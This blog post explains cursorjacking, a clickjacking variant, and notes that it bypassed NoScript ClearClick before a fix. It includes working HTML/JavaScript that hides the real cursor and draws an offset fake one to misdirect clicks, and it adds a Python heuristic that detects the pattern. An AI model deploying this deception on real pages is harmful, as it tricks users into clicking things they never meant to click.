About a year ago, Marcus Niemietz demonstrated a UI redressing technique called cursorjacking. It deceived users by using a custom cursor image in which the pointer was drawn with an offset, so the displayed cursor was shifted to the right of the actual mouse position. With clever positioning of page elements, an attacker could direct user clicks to the desired elements.
Cursor fun
Yesterday Mario Heiderich noticed that <body style="cursor:none"> works across User-Agents, so one can easily hide the original mouse cursor entirely. Combine that with a mousemove listener, a mouse cursor image and a little distraction, and we have another UI redressing vector. The idea is very simple:
```html
<body style="cursor:none;height: 1000px;">
  <img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" />
  <button id=fake style="font-size: 150%;position:absolute;top:100px;left:630px;">click me click me</button>
  <div style="position:absolute;top:100px;left:30px;">
    <a href="#" onclick="alert(/you clicked-me-instead/)">i'm not important</a>
  </div>
  <script>
    var oNode = document.getElementById('cursor');
    var onmove = function (e) {
      var nMoveX = e.clientX, nMoveY = e.clientY;
      oNode.style.left = (nMoveX + 600) + "px";
      oNode.style.top = nMoveY + "px";
    };
    document.body.addEventListener('mousemove', onmove, true);
  </script>
</body>
```
The one on the left is real, the one on the right is fake. The idea is to distract you from noticing the left one.
Demo
It's just a sketch (e.g. in real life one would have to handle the mouse cursor skipping when it's over a frame), but it works nonetheless. Try this good cursorjacking example ;) Here are the sources for anyone interested.
Bonus
NoScript ClearClick (a clickjacking protection) works because it detects clicks on areas that are hidden from the user (e.g. with opacity:0). With cursorjacking the protection isn't triggered, as the attacker is not hiding the original element to click on (the Twitter button in the PoC). The only deception is distraction. So, currently, this technique is a NoScript ClearClick protection bypass.
Update: Fixed in NoScript 2.2.8 RC1
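Since ClearClick looks for hidden targets and this trick hides nothing, a reviewer has to look for the distraction itself. The scanner below is an added example, not part of the original post or of NoScript: it is a constructed static heuristic that flags the three markup indicators the post relies on (cursor:none on the body, an absolutely positioned high z-index image, and a mousemove handler that places an element at a fixed pixel offset from the pointer). The SAMPLE string is a constructed copy of the PoC markup above.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a copy of the proof-of-concept markup from the post above.
SAMPLE = """<body style="cursor:none;height: 1000px;">
<img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" />
<button id=fake style="position:absolute;top:100px;left:630px;">click me</button>
<script>
var c = document.getElementById('cursor');
document.body.addEventListener('mousemove', function (e) {
  c.style.left = (e.clientX + 600) + "px"; c.style.top = e.clientY + "px";
}, true);
</script></body>"""

class _Scan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden_cursor = False   # cursor:none set on <body> or <html>
        self.overlay_images = 0      # absolutely positioned <img> with z-index >= 100
        self.scripts = []            # inline script bodies, inspected afterwards
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        style = (dict(attrs).get("style") or "").replace(" ", "").lower()
        if tag in ("body", "html") and "cursor:none" in style:
            self.hidden_cursor = True
        if tag == "img" and "position:absolute" in style and re.search(r"z-index:\d{3,}", style):
            self.overlay_images += 1
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def detect_cursorjacking(html):
    """Return the indicators found in the markup; an empty list means none of the pattern is present."""
    p = _Scan()
    p.feed(html)
    js = "\n".join(p.scripts)
    # mousemove handler that reads the pointer position and writes "<number>px" with an added offset
    tracks = "mousemove" in js and "clientX" in js and bool(re.search(r"[+-]\s*\d+\s*\)?\s*\+\s*[\"']px", js))
    checks = [
        (p.hidden_cursor, "native cursor hidden with cursor:none"),
        (p.overlay_images > 0, "absolutely positioned image with a large z-index"),
        (tracks, "mousemove handler places an element at a fixed offset from the pointer"),
    ]
    return [msg for hit, msg in checks if hit]
```

A heuristic like this only catches the plain form shown here; a page that hides the cursor or positions the image from a stylesheet or a separate script would need the rendered DOM inspected instead.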
Hahaha, I love that script :)